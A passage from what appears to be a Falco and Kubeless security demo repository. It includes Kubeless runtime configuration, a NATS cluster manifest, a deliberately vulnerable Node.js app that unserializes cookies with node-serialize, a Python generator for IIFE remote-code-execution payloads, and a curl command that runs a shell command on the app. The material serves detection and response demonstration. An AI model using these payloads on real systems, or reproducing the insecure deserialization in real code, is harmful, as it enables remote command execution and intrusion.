"kubeless/python@sha256:07cfb0f3d8b6db045dc317d35d15634d7be5e436944c276bf37b1c630b03add8", 25 | "initImage": "python:2.7" 26 | }, 27 | { 28 | "name": "python34", 29 | "version": "3.4", 30 | "runtimeImage": "kubeless/python@sha256:f19640c547a3f91dbbfb18c15b5e624029b4065c1baf2892144e07c36f0a7c8f", 31 | "initImage": "python:3.4" 32 | }, 33 | { 34 | "name": "python36", 35 | "version": "3.6", 36 | "runtimeImage": 
"kubeless/python@sha256:0c9f8f727d42625a4e25230cfe612df7488b65f283e7972f84108d87e7443d72", 37 | "initImage": "python:3.6" 38 | } 39 | ], 40 | "depName": "requirements.txt", 41 | "fileNameSuffix": ".py" 42 | }, 43 | { 44 | "ID": "nodejs", 45 | "compiled": false, 46 | "versions": [ 47 | { 48 | "name": "node6", 49 | "version": "6", 50 | "runtimeImage": "kubeless/nodejs@sha256:61c5a10aacb709c4575a09a4aa28f822b2d008c0dbf4aa0b124705ee9ca143f9", 51 | "initImage": "node:6.10" 52 | }, 53 | { 54 | "name": "node8", 55 | "version": "8", 56 | "runtimeImage": "kubeless/nodejs@sha256:fc1aa96e55116400ee13d664a655dfb2025ded91858ebfd5fc0c8f0d6b923eba", 57 | "initImage": "node:8" 58 | } 59 | ], 60 | "depName": "package.json", 61 | "fileNameSuffix": ".js" 62 | }, 63 | { 64 | "ID": "ruby", 65 | "compiled": false, 66 | "versions": [ 67 | { 68 | "name": "ruby24", 69 | "version": "2.4", 70 | "runtimeImage": "kubeless/ruby@sha256:0dce29c0eb2a246f7d825b6644eeae7957b26f2bfad2b7987f2134cc7b350f2f", 71 | "initImage": "bitnami/ruby:2.4" 72 | } 73 | ], 74 | "depName": "Gemfile", 75 | "fileNameSuffix": ".rb" 76 | }, 77 | { 78 | "ID": "php", 79 | "compiled": false, 80 | "versions": [ 81 | { 82 | "name": "php72", 83 | "version": "7.2", 84 | "runtimeImage": "kubeless/php@sha256:82b94c691302bc82f3900444255cabb8f230487764eafeba7866ac49d90ddc3b", 85 | "initImage": "composer:1.6" 86 | } 87 | ], 88 | "depName": "composer.json", 89 | "fileNameSuffix": ".php" 90 | }, 91 | { 92 | "ID": "go", 93 | "compiled": true, 94 | "versions": [ 95 | { 96 | "name": "go1.10", 97 | "version": "1.10", 98 | "runtimeImage": "kubeless/go@sha256:bf72622344a54e4360f31d3fea5eb9dca2c96fbedc6f0ad7c54f3eb8fb7bd353", 99 | "initImage": "kubeless/go-init@sha256:ce6ef4fafe518ed78b3a68b03947c064fec1cf8c667cd109e9331f227877b3a9" 100 | } 101 | ], 102 | "depName": "Gopkg.toml", 103 | "fileNameSuffix": ".go" 104 | } 105 | ] 106 | service-type: ClusterIP -------------------------------------------------------------------------------- 
/kubeless-function/requirements.txt: -------------------------------------------------------------------------------- 1 | kubernetes==2.0.0 2 | -------------------------------------------------------------------------------- /nats-cluster-via-CRD.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: "nats.io/v1alpha2" 2 | kind: "NatsCluster" 3 | metadata: 4 | name: "nats" 5 | spec: 6 | size: 3 7 | version: "1.1.0" -------------------------------------------------------------------------------- /nodejs-app/README.md: -------------------------------------------------------------------------------- 1 | # Deploy a Vulnerable Node.js Application 2 | 3 | This example deploys a vulnerable Node.js application that allows remote command execution. The application does not sanitize its inputs and is therefore vulnerable to attacks that abuse a JavaScript feature called Immediately Invoked Function Expressions (IIFE). 4 | 5 | ## Deploy the Application 6 | 7 | To deploy the vulnerable application, run: 8 | ``` 9 | $ kubectl create -f nodejs-app.yml 10 | ``` 11 | 12 | ## node-exploit 13 | 14 | This directory contains the vulnerable application and the Dockerfile used to build the container image. 15 | 16 | ## nodejspayload.py 17 | 18 | Use this to generate a payload that exploits the application.
On a macOS or Linux system, run: 19 | 20 | ``` 21 | $ python nodejspayload.py "ls -l /" | base64 22 | eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTAxLDEyMCwxMDEsOTksNDAsMzksMTA4LDExNSwzMiw0NSwxMDgsMzIsNDcsMzksNDQsMzIsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDQwLDEwMSwxMTQsMTE0LDExMSwxMTQsNDQsMzIsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDQsMzIsMTE1LDExNiwxMDAsMTAxLDExNCwxMTQsNDEsMzIsMTIzLDMyLDk5LDExMSwxMTAsMTE1LDExMSwxMDgsMTAxLDQ2LDEwOCwxMTEsMTAzLDQwLDExNSwxMTYsMTAwLDExMSwxMTcsMTE2LDQxLDMyLDEyNSw0MSw1OSwxMCkpfSgpIn0= 23 | ``` 24 | 25 | Set a cookie with this data via curl and access the application. The output of the command that is run will appear in the container's `stdout`. 26 | 27 | ``` 28 | curl --cookie "profile=eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTAxLDEyMCwxMDEsOTksNDAsMzksMTA4LDExNSwzMiw0NSwxMDgsMzIsNDcsMzksNDQsMzIsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDQwLDEwMSwxMTQsMTE0LDExMSwxMTQsNDQsMzIsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDQsMzIsMTE1LDExNiwxMDAsMTAxLDExNCwxMTQsNDEsMzIsMTIzLDMyLDk5LDExMSwxMTAsMTE1LDExMSwxMDgsMTAxLDQ2LDEwOCwxMTEsMTAzLDQwLDExNSwxMTYsMTAwLDExMSwxMTcsMTE2LDQxLDMyLDEyNSw0MSw1OSwxMCkpfSgpIn0=" http://:30080/ 29 | Hello World 30 | ``` 31 | -------------------------------------------------------------------------------- /nodejs-app/node-exploit/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:carbon 2 | 3 | WORKDIR /usr/src/app 4 | 5 | COPY package*.json ./ 6 | 7 | RUN npm install 8 | 9 | COPY . .
10 | 11 | EXPOSE 3000 12 | 13 | CMD [ "npm", "start" ] -------------------------------------------------------------------------------- /nodejs-app/node-exploit/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "node-exploit", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "server.js", 6 | "dependencies": { 7 | "express": "4.16.1", 8 | "cookie-parser": "1.4.3", 9 | "escape-html": "1.0.3", 10 | "node-serialize": "0.0.4" 11 | }, 12 | "scripts": { 13 | "test": "echo \"Error: no test specified\" && exit 1", 14 | "start": "node server.js" 15 | }, 16 | "author": "", 17 | "license": "ISC" 18 | } 19 | -------------------------------------------------------------------------------- /nodejs-app/node-exploit/server.js: -------------------------------------------------------------------------------- 1 | var express = require('express'); 2 | var cookieParser = require('cookie-parser'); 3 | var escape = require('escape-html'); 4 | var serialize = require('node-serialize'); 5 | var app = express(); 6 | app.use(cookieParser()) 7 | 8 | app.get('/', function(req, res) { 9 | if (req.cookies.profile) { 10 | var str = Buffer.from(req.cookies.profile, 'base64').toString(); 11 | var obj = serialize.unserialize(str); 12 | if (obj.username) { 13 | return res.send("Hello " + escape(obj.username)); 14 | } 15 | } else { 16 | res.cookie('profile', "eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0=", { 17 | maxAge: 900000, 18 | httpOnly: true 19 | }); 20 | } 21 | res.send("Hello World"); 22 | }); 23 | app.listen(3000); -------------------------------------------------------------------------------- /nodejs-app/nodejs-app.yml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: node-app 5 | namespace: node-app 6 | labels: 7 | app: node-app 8 | role: frontend 9 | spec: 10 | type: NodePort 11 | ports: 12 | - port:
3000 13 | nodePort: 30080 14 | selector: 15 | app: node-app 16 | role: frontend 17 | --- 18 | apiVersion: extensions/v1beta1 19 | kind: Deployment 20 | metadata: 21 | name: frontend 22 | namespace: node-app 23 | spec: 24 | replicas: 1 25 | strategy: 26 | rollingUpdate: 27 | maxUnavailable: 0 28 | maxSurge: 1 29 | template: 30 | metadata: 31 | labels: 32 | app: node-app 33 | role: frontend 34 | spec: 35 | containers: 36 | - name: frontend 37 | image: sysdiglabs/node-exploit:latest -------------------------------------------------------------------------------- /nodejs-app/nodejspayload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Generator for encoded NodeJS payloads for exploiting unserialization and IIFE 3 | # Based on the NodeJS reverse shell by OpSecX 4 | # https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py 5 | # Based on the NodeJS reverse shell by Evilpacket 6 | # https://github.com/evilpacket/node-shells/blob/master/node_revshell.js 7 | # Onelineified and suchlike by infodox (and felicity, who sat on the keyboard) 8 | # Insecurety Research (2013) - insecurety.net 9 | import sys 10 | 11 | if len(sys.argv) != 2: 12 | print "Usage: %s CMD" % (sys.argv[0]) 13 | sys.exit(0) 14 | 15 | CMD = sys.argv[1] 16 | 17 | 18 | def charencode(string): 19 | """String.CharCode""" 20 | encoded = '' 21 | for char in string: 22 | encoded = encoded + "," + str(ord(char)) 23 | return encoded[1:] 24 | 25 | NODEJS_REV_SHELL = ''' 26 | require('child_process').exec('%s', function(error, stdout, stderr) { console.log(stdout) }); 27 | ''' % (CMD) 28 | 29 | PAYLOAD = charencode(NODEJS_REV_SHELL) 30 | sys.stdout.write('{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(%s))}()"}' % (PAYLOAD)) -------------------------------------------------------------------------------- /read.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 
read.sh /path/to/pipe 3 | # 4 | This script reads from a named pipe and prints anything read. 5 | 6 | pipe="$1" 7 | 8 | while true 9 | do 10 | if read -r line < "$pipe"; then 11 | echo "$line" 12 | fi 13 | done 14 | --------------------------------------------------------------------------------
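Putting the pieces together: Falco writes alerts to a named pipe, `nats-pub` publishes each line to the `FALCO` topic, and the Kubeless function deletes the offending Pod. The filtering step in `kubeless-function/delete-pod.py` can be sketched as a self-contained function; the event shape mirrors the Falco alert fields used in that file, and `should_delete` is an illustrative name, not code from this repo:

```python
def should_delete(event):
    """Decide whether a Falco alert warrants deleting the offending Pod.

    Mirrors delete-pod.py: only Critical alerts that originate from a
    container (container.id != "host") trigger a delete. Returns the Pod
    name to delete, or None.
    """
    data = event.get("data") or {}
    priority = data.get("priority")
    fields = data.get("output_fields") or {}
    if priority == "Critical" and fields.get("container.id") not in (None, "host"):
        return fields.get("k8s.pod.name")
    return None

# A Critical alert from a container names the Pod to delete...
alert = {"data": {"priority": "Critical",
                  "output_fields": {"container.id": "abc123",
                                    "k8s.pod.name": "frontend-5f4d"}}}
print(should_delete(alert))  # -> frontend-5f4d

# ...while host-level (or lower-priority) alerts are ignored.
host_alert = {"data": {"priority": "Critical",
                       "output_fields": {"container.id": "host"}}}
print(should_delete(host_alert))  # -> None
```

Keeping the decision logic as a pure function like this makes it easy to test the trigger conditions without a cluster; the actual delete still needs the Kubernetes client and the `falco-pod-delete` service account described above.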